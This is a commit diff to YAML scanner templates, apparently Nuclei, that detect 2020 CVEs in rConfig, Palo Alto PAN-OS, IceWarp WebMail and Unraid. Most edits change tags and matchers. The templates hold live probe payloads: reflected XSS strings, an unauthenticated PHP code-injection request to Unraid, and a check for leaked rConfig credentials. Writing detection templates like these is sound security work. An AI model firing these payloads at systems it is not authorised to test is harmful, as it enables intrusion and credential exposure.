misc changes
parent
93ede98673
commit
6e392df4c4
|
@ -4,7 +4,7 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
|
||||||
tags: SQLI
|
tags: cve,cve2020,rconfig,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
|
||||||
tags: SQLI
|
tags: cve,cve2020,rconfig,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
|
||||||
tags: SQLI
|
tags: cve,cve2020,rconfig,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
|
||||||
tags: SQLI
|
tags: cve,cve2020,rconfig,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,21 +1,29 @@
|
||||||
id: CVE-2020-2036
|
id: CVE-2020-2036
|
||||||
info:
|
info:
|
||||||
name: Palo Alto Networks Reflected Cross Site Scripting
|
name: Palo Alto Networks Reflected XSS
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
|
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
|
||||||
tags: XSS
|
tags: cve,cve2020,vpn,xss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
||||||
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<svg/onload=alert(1)>"
|
- "<svg/onload=alert(1)>"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
|
@ -4,18 +4,25 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
|
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
|
||||||
tags: XSS
|
tags: cve,cve2020,xss,icewarp
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
|
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<img src=x onerror=alert(1)>"
|
- "<img src=x onerror=alert(1)>"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
|
@ -4,12 +4,13 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
|
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
|
||||||
tags: Directory Traversal
|
tags: cve,cve2020,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
|
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
@ -17,5 +18,6 @@ requests:
|
||||||
- 200
|
- 200
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "http://www.php.net/"
|
- "PHP Extension"
|
||||||
part: body
|
- "PHP Version"
|
||||||
|
condition: and
|
||||||
|
|
|
@ -3,8 +3,8 @@ info:
|
||||||
name: rConfig Unauthenticated Sensitive Information Disclosure
|
name: rConfig Unauthenticated Sensitive Information Disclosure
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9425
|
||||||
tags: Information Disclosure
|
tags: cve,cve2020,rconfig
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -19,4 +19,5 @@ requests:
|
||||||
words:
|
words:
|
||||||
- "defaultNodeUsername"
|
- "defaultNodeUsername"
|
||||||
- "defaultNodePassword"
|
- "defaultNodePassword"
|
||||||
|
condition: and
|
||||||
part: body
|
part: body
|
||||||
|
|
Loading…
Reference in New Issue